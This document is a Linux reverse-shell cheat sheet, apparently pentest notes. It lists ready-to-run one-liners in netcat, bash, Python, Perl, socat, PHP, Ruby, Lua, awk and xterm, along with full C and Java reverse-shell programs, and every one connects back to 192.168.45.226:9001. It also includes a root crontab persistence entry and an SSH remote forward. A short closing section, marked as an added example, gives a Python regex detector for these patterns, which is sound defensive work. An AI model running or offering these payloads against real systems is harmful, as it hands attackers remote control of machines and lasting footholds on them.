Code Execution - Linux Snippets
Netcat - Reverse Shell
nc -e /bin/bash 192.168.45.226 9001
/bin/sh -i >& /dev/tcp/192.168.45.226/9001 0>&1
Creates a reverse shell using netcat or bash.
Bash - Reverse Shell
bash -i >& /dev/tcp/192.168.45.226/9001 0>&1
Runs an interactive shell in the background over a TCP connection.
Python - Reverse Shell
python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.226",9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"]);'
Runs a reverse shell via Python, useful on systems without nc.
Perl - Reverse Shell
perl -e 'use Socket;$i="192.168.45.226";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Runs a reverse shell via Perl.
Socat - Reverse Shell
socat TCP4:192.168.45.226:9001 EXEC:/bin/bash
socat file:`tty`,raw,echo=0 TCP:192.168.45.226:9001
Uses socat to open a reverse or interactive connection.
PHP - Reverse Shell
php -r '$sock=fsockopen("192.168.45.226",9001);exec("/bin/sh -i <&3 >&3 2>&3");'
Useful for vulnerable web servers that run PHP.
Ruby - Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("192.168.45.226",9001).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Runs a reverse shell via Ruby.
Lua - Reverse Shell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.45.226','9001');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Runs a reverse shell via Lua.
AWK - Reverse Shell
awk 'BEGIN {s = "/inet/tcp/0/192.168.45.226/9001"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Runs a reverse shell via awk.
C - Reverse Shell
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
    int port = 9001;
    struct sockaddr_in revsockaddr;
    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.45.226");
    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2);
    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    return 0;
}
Compile with:
gcc shell.c -o shell -Wall
Runs a reverse shell via C.
Java - Reverse Shell
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class ReverseShell {
    public static void main(String[] args) throws IOException {
        String host = "192.168.45.226";
        int port = 9001;
        String cmd = "/bin/sh";
        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s = new Socket(host, port);
        InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
        OutputStream po = p.getOutputStream(), so = s.getOutputStream();
        while (!s.isClosed()) {
            while (pi.available() > 0) so.write(pi.read());
            while (pe.available() > 0) so.write(pe.read());
            while (si.available() > 0) po.write(si.read());
            so.flush(); po.flush();
            try { p.exitValue(); break; } catch (Exception e) {}
        };
        p.destroy(); s.close();
    }
}
Compile with:
javac ReverseShell.java
java ReverseShell
Runs a reverse shell via Java.
SSH - Forward Shell
ssh -R 9001:localhost:22 user@192.168.45.226
Forwards the SSH connection to a remote listener.
Cronjob - Persistence
echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/192.168.45.226/9001 0>&1"' >> /etc/crontab
Creates a cron entry that runs the reverse shell automatically.
/dev/tcp - Reverse Shell
exec 5<>/dev/tcp/192.168.45.226/9001; cat <&5 | while read line; do $line 2>&5 >&5; done
Uses /dev/tcp to create a reverse shell.
Xterm - Reverse Shell
xterm -display 192.168.45.226:1
Requires an X11 server running on the attacking system.
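Detection - Command Line and Crontab Signatures
The snippets above share a few recognizable shapes, and the cron persistence entry leaves one in /etc/crontab. The following is an added example, not part of the original page: a small matcher a defender could run over collected command lines and crontab content. The rule names, helper functions and sample inputs are assumptions constructed for this illustration.

```python
import re

# Rule names and patterns are this example's own, derived from the snippet shapes above.
# Shell redirections never reach argv, so the /dev/tcp form shows up in cron lines,
# scripts, shell history and `bash -c "..."` strings rather than in a bare process name.
RULES = [
    ("dev_tcp_redirect", re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")),
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-zA-Z]*e\b")),
    ("socat_exec", re.compile(r"\bsocat\b.*\bEXEC:", re.I)),
    ("interp_socket_shell", re.compile(
        r"\b(python[\d.]*|perl|ruby|php|lua)\b.*(socket|fsockopen).*/bin/(ba)?sh", re.I)),
    ("awk_inet", re.compile(r"/inet/tcp/\d+/[^/\s]+/\d+")),
]

def match_rules(text):
    """Return the names of all rules that match one command line or cron line."""
    return [name for name, rx in RULES if rx.search(text)]

def scan_crontab(content):
    """Return (line_number, rule_names) for each active (non-comment) cron line that matches."""
    hits = []
    for n, line in enumerate(content.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        names = match_rules(stripped)
        if names:
            hits.append((n, names))
    return hits

# Constructed sample input (192.0.2.10 is a documentation address, not from the page).
SAMPLE_CMDLINES = [
    "nc -e /bin/bash 192.0.2.10 9001",
    "bash -i >& /dev/tcp/192.0.2.10/9001 0>&1",
    "socat TCP4:192.0.2.10:9001 EXEC:/bin/bash",
    "nc -zv 192.0.2.10 22",           # benign port check, must not match
    "python3 -m http.server 8000",    # benign interpreter use, must not match
]
SAMPLE_CRONTAB = """# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/bash -c "bash -i >& /dev/tcp/192.0.2.10/9001 0>&1"
"""

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(match_rules(cmd) or "clean", "<-", cmd)
    print(scan_crontab(SAMPLE_CRONTAB))
```

String signatures like these are easy to evade through renamed binaries or encoding, so treat a match as a triage lead alongside egress filtering and process-to-socket telemetry.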